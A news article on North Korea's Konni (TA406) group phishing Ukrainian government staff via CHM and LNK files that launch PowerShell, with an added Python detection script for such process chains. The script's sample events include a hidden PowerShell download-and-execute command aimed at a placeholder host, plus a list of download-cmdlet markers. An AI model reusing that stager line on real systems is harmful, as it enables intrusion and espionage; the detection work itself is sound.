The state-backed North Korean threat group Konni (also tracked as Opal Sleet and TA406) has been observed targeting Ukrainian government entities in intelligence collection operations.
The attackers use phishing emails that impersonate think tanks, referencing important political events or military developments to lure their targets.
Proofpoint researchers who discovered the activity in February 2025 suggest that it’s likely an effort to support the DPRK’s military involvement alongside Russia in Ukraine and evaluate the political status underpinning the conflict.
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” explain the researchers.
“North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments.”
Attack chain
The malicious emails sent to targets impersonate members of fictitious think tanks and discuss key issues such as the recent dismissals of military leaders or presidential elections in Ukraine.
The attackers use freemail services like Gmail, ProtonMail, and Outlook to send repeated messages to their targets, urging them to click on an embedded link.
Doing so takes the victims to a MEGA-hosted download that drops a password-protected .RAR archive (Analytical Report.rar) on their systems, containing a .CHM file with the same name.
Opening the CHM file runs embedded PowerShell that downloads a next-stage PowerShell script, which collects reconnaissance information from the infected host and establishes persistence.
Proofpoint has also seen variants that use HTML attachments dropping ZIP archives containing benign PDFs and malicious LNK files, which lead to PowerShell and VBScript execution.
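Both delivery chains end with a script host launched from an unusual parent: the HTML Help viewer (hh.exe) for the CHM path, or Explorer for a double-clicked LNK. The following is an added detection example (not from Proofpoint or the article) that flags those parent/child pairings in Sysmon-style process-creation events; the parent-process names, download-cmdlet markers and sample events are my own assumptions, constructed for illustration.

```python
"""Flag CHM -> PowerShell and LNK -> PowerShell/VBScript chains in
process-creation telemetry (Sysmon Event ID 1 style fields)."""
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


# Script hosts seen at the end of both chains described in the article.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# Assumed markers of a PowerShell stager fetching a next stage (heuristic, not exhaustive).
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "invoke-expression", "iex ", "iex(", "frombase64string")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent):
    """Return a detection tag for a suspicious event, or None if it looks benign."""
    parent, child, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line.lower()
    # CHM chain: the HTML Help viewer should never need to launch a script host.
    if parent == "hh.exe" and child in SCRIPT_HOSTS:
        return "chm-spawned-script-host"
    # LNK chain: Explorer launching a script host whose command line fetches or decodes a payload.
    if parent == "explorer.exe" and child in SCRIPT_HOSTS and any(m in cmd for m in DOWNLOAD_MARKERS):
        return "lnk-style-script-host-download"
    return None


def scan(events):
    """Return (index, tag) pairs for every event that triggers a detection."""
    return [(i, tag) for i, ev in enumerate(events) if (tag := classify(ev))]


# Constructed sample events; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\hh.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"Start-Process notepad\""),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://stage.example.invalid/r.ps1')\""),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Users\user\scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tag} <- {SAMPLE_EVENTS[idx].command_line}")
```

The first rule is low-noise on its own; the second depends on the command-line markers and should be tuned against the environment's legitimate PowerShell usage before alerting on it.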
Proofpoint could not retrieve the final payload in these attacks, which is believed to be a backdoor or similar malware that facilitates espionage operations.
The researchers also noted that Konni conducted preparatory attacks earlier, targeting the same people and attempting to harvest account credentials that could be used to hijack their accounts.
These attempts involved emails spoofing Microsoft security alerts, claiming “unusual sign-in activity,” and asking the recipient to verify their login on a phishing site at “jetmf[.]com.”
North Korea’s targeting of Ukrainian government entities adds a new dimension to the country’s already complex cybersecurity battlefield, which has been dominated by relentless Russian state-sponsored attacks since the start of the invasion.